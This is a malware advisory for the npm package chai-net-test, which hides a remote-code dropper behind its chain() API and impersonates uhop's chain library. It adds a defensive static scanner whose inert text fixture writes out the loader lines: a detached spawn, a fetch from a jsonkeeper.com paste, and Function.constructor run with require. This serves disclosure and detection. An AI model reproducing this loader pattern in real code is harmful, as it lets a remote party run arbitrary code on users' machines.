Vulnerability
Malicious code in chai-net-test (npm)
## Source: amazon-inspector (cd5f4bb3d7abae3be57c7521b84016b6484d4c21bd2898fcde043d376513cf1e)

chai-net-test ships a remote-code-execution dropper behind its public `chain()` API. When a consumer calls `chain([...])` (the documented entry point), src/index.js spawns src/utils/swap.js as a detached child Node process. swap.js performs `axios.get('https://www.jsonkeeper.com/b/5IZTJ')`, takes the response's `.Cookie` string, builds a function via `new Function.constructor('require', s)`, and invokes it with the package's `require` — granting the attacker-supplied JavaScript full Node module access on the consumer's machine. The destination, jsonkeeper.com, is a public anonymous JSON paste host whose contents can be changed at will by whoever holds the paste id, so the executed bytes can change at any moment without any package republish. The package additionally impersonates the legitimate stream-chaining library `chain` by uhop: the README claims to be a 'lightweight, no-dependencies micro-package' and links to uhop's wiki, while package.json declares runtime dependencies on axios and sqlite3 — a cover story to lure consumers of the real library into invoking the trojaned API.
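The advisory above names four observable traits of the package: a detached child Node process, a fetch from a mutable public paste host, a runtime-built function that is handed `require`, and a README "no-dependencies" claim contradicted by package.json. The following is an added example, not code from the advisory or from the package it describes: a small static triage scanner that flags each of those traits in package source and metadata and escalates the fetch-plus-dynamic-code combination to a single verdict. The paste-host list beyond jsonkeeper.com, the finding ids and severities, and all fixture text are constructed for this example; the fixture is only scanned as text, never executed.

```javascript
// Added example: static triage for the dropper shape the advisory describes.
// Nothing here is the package's own code; fixtures are constructed and inert.

// Assumed list of anonymous paste hosts whose content the publisher can mutate
// without touching the npm package. jsonkeeper.com is from the advisory.
const PASTE_HOSTS = ['jsonkeeper.com', 'pastebin.com', 'hastebin.com'];

// Return the host of every http(s) URL literal found in the source text.
function extractHosts(source) {
  const hosts = [];
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(source)) !== null) hosts.push(m[1].toLowerCase());
  return hosts;
}

function isPasteHost(host) {
  return PASTE_HOSTS.some((h) => host === h || host.endsWith('.' + h));
}

// Scan JavaScript source text for the three runtime indicators.
function scanSource(source) {
  const findings = [];
  const usesChildProcess = /require\(\s*['"](?:node:)?child_process['"]\s*\)/.test(source);
  if (usesChildProcess && /detached\s*:\s*true/.test(source)) {
    findings.push({ id: 'detached-child', severity: 'medium',
      detail: 'spawns a detached child process' });
  }
  const pasteHosts = extractHosts(source).filter(isPasteHost);
  if (pasteHosts.length > 0) {
    findings.push({ id: 'paste-host-fetch', severity: 'medium',
      detail: 'contacts mutable paste host: ' + [...new Set(pasteHosts)].join(', ') });
  }
  // new Function('require', ...) and Function.constructor('require', ...) both
  // build code at runtime with the module loader in scope.
  if (/\bFunction(?:\.constructor)?\s*\(\s*['"]require['"]/.test(source)) {
    findings.push({ id: 'dynamic-code-with-require', severity: 'high',
      detail: 'builds a function at runtime that receives require' });
  } else if (/\beval\s*\(/.test(source)) {
    findings.push({ id: 'eval', severity: 'low', detail: 'uses eval' });
  }
  return findings;
}

// Cross-check the README's marketing claim against declared runtime dependencies.
function scanMetadata(packageJson, readme) {
  const findings = [];
  const deps = Object.keys(packageJson.dependencies || {});
  const claimsNoDeps = /\b(?:no|zero)[- ]dependenc(?:y|ies)\b/i.test(readme);
  if (claimsNoDeps && deps.length > 0) {
    findings.push({ id: 'readme-dependency-mismatch', severity: 'medium',
      detail: 'README claims no dependencies but package.json declares: ' + deps.join(', ') });
  }
  return findings;
}

// A paste-host fetch together with dynamic code that receives `require` is the
// remote loader shape from the advisory, so that pair is escalated on its own.
function scanPackage({ source, packageJson, readme }) {
  const findings = [...scanSource(source), ...scanMetadata(packageJson, readme)];
  const ids = new Set(findings.map((f) => f.id));
  let verdict = 'clean';
  if (ids.has('paste-host-fetch') && ids.has('dynamic-code-with-require')) verdict = 'remote-code-loader';
  else if (findings.some((f) => f.severity === 'high')) verdict = 'suspicious';
  else if (findings.length > 0) verdict = 'review';
  return { verdict, findings };
}

// Constructed indicator fixture (text only, never executed). Paths and paste id
// are placeholders, not the package's real values.
const SUSPECT_SOURCE = [
  "const { spawn } = require('child_process');",
  "spawn(process.execPath, ['utils/PLACEHOLDER.js'], { detached: true, stdio: 'ignore' }).unref();",
  "const res = await axios.get('https://www.jsonkeeper.com/b/PLACEHOLDER');",
  "new Function.constructor('require', res.data.Cookie)(require);",
].join('\n');
const SUSPECT_PACKAGE_JSON = { name: 'example-pkg', dependencies: { axios: '^1.0.0', sqlite3: '^5.0.0' } };
const SUSPECT_README = 'A lightweight, no-dependencies micro-package for chaining streams.';

// Constructed benign fixture: a plain stream-chaining helper with no dependencies.
const BENIGN_SOURCE = [
  "const { PassThrough } = require('stream');",
  "module.exports = function chain(list) { return list.reduce((a, b) => a.pipe(b)); };",
].join('\n');
const BENIGN_PACKAGE_JSON = { name: 'example-benign' };

console.log(JSON.stringify(scanPackage({ source: SUSPECT_SOURCE, packageJson: SUSPECT_PACKAGE_JSON, readme: SUSPECT_README }), null, 2));
console.log(JSON.stringify(scanPackage({ source: BENIGN_SOURCE, packageJson: BENIGN_PACKAGE_JSON, readme: SUSPECT_README }), null, 2));
```

The benign fixture reuses the same "no-dependencies" README on purpose: the claim alone is not a finding, only the claim combined with declared dependencies is, which keeps the metadata check from flagging every honest micro-package.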
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs.
For interim severity, fall back on KEV / exploit signals and the EPSS percentile.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands.
No exploitation, limited impact or prevalence